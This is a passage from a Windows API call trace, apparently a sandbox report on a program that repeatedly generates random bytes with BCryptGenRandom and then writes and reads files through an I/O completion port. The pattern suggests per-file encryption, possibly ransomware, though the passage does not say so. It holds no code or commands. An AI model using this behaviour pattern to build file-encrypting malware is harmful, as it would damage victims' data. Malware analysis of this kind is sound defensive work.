_Size=0x4) returned 0x77d800 [0081.922] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.922] free (_Block=0x77d800) [0081.922] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.922] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.922] free (_Block=0x1ff1930) [0081.923] free (_Block=0x1ff1a40) [0081.923] free (_Block=0x77d908) [0081.923] WriteFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0081.923] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.931] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.931] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0081.931] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.932] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0081.932] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.932] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.932] free (_Block=0x77d800) [0081.932] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.932] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.933] free (_Block=0x1ff1930) [0081.933] free (_Block=0x1ff1a40) [0081.933] free (_Block=0x77d908) [0081.933] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0081.933] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.967] CloseHandle (hObject=0x3b4) returned 1 [0081.967] free (_Block=0x1fb18c0) [0081.967] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.987] CloseHandle (hObject=0x3c4) returned 1 [0081.988] free (_Block=0x1ff1e60) [0081.988] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0082.007] CloseHandle (hObject=0x3a0) returned 1 [0082.012] free (_Block=0x3d70048) [0082.012] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0082.022] WriteFile (in: hFile=0x3c0, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2810, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0082.022] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0083.006] CloseHandle (hObject=0x3c0) returned 1 [0083.007] free (_Block=0x2031ed0) [0083.007] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0083.009] WriteFile (in: hFile=0x3a0, lpBuffer=0x3df015c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128) returned 1 [0083.010] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0083.241] ReadFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0083.244] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.174] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0084.175] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.189] WriteFile (in: hFile=0x3bc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0084.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.210] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xb4b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0084.210] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.243] ReadFile (in: hFile=0x3c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xbc8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0084.243] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.265] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x7e3, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.265] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.269] ReadFile (in: hFile=0x3bc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x33b7, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0084.271] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.271] CloseHandle (hObject=0x3bc) returned 1 [0084.272] free (_Block=0x3df0008) [0084.272] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.714] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.714] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0084.715] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.715] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0084.718] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0084.718] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0084.718] free (_Block=0x77d800) [0084.718] calloc (_Count=0x41, _Size=0x4) returned 0x2071f40 [0084.718] calloc (_Count=0x82, _Size=0x4) returned 0x2072050 [0084.719] free (_Block=0x2071f40) [0084.719] free (_Block=0x2072050) [0084.719] free (_Block=0x77d908) [0084.719] WriteFile (in: hFile=0x3b4, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0084.719] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.720] WriteFile (in: hFile=0x3b4, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x1690, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0084.720] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.721] CloseHandle (hObject=0x3b4) returned 1 [0084.721] free (_Block=0x2031ed0) [0084.724] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.735] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.736] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0084.736] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.737] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0084.737] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0084.737] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0084.737] free (_Block=0x1ff1e60) [0084.737] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0084.737] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0084.738] free (_Block=0x1ff1e60) [0084.738] free (_Block=0x1ff1930) [0084.738] free (_Block=0x77d800) [0084.738] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.738] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.739] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x1ff0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.739] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.757] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x643e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.758] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.771] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x1816, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.772] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.772] CloseHandle (hObject=0x3b4) returned 1 [0084.777] free (_Block=0x1fb18c0) [0084.777] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.787] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.788] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0084.788] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.788] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0084.789] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0084.789] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0084.789] free (_Block=0x1ff1e60) [0084.789] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0084.789] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0084.789] free (_Block=0x1ff1e60) [0084.789] free (_Block=0x1ff1930) [0084.789] free (_Block=0x77d800) [0084.789] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.789] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.790] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x1f10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.790] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.815] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x1146, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.815] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.816] CloseHandle (hObject=0x3b4) returned 1 [0084.820] free (_Block=0x1fb18c0) [0084.820] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.832] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.833] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0084.833] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.834] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0084.834] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0084.834] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0084.834] free (_Block=0x1ff1e60) [0084.834] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0084.834] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0084.835] free (_Block=0x1ff1e60) [0084.835] free (_Block=0x1ff1930) [0084.835] free (_Block=0x77d800) [0084.835] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.835] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.836] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x1ed0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.837] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.860] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x41ca, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.860] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.861] CloseHandle (hObject=0x3b4) returned 1 [0084.864] free (_Block=0x1fb18c0) [0084.864] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.876] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.877] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0084.877] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.877] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0084.878] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0084.878] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0084.878] free (_Block=0x1ff1e60) [0084.878] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0084.878] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0084.878] free (_Block=0x1ff1e60) [0084.878] free (_Block=0x1ff1930) [0084.878] free (_Block=0x77d800) [0084.878] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.879] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.882] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x3dd30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.883] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.886] CloseHandle (hObject=0x3b4) returned 1 [0084.887] free (_Block=0x1fb18c0) [0084.887] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.906] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.906] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0084.907] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.907] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0084.907] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0084.907] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0084.908] free (_Block=0x1ff1e60) [0084.908] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0084.908] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0084.908] free (_Block=0x1ff1e60) [0084.908] free (_Block=0x1ff1930) [0084.908] free (_Block=0x77d800) [0084.908] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.911] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.914] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x3fc70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.915] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, 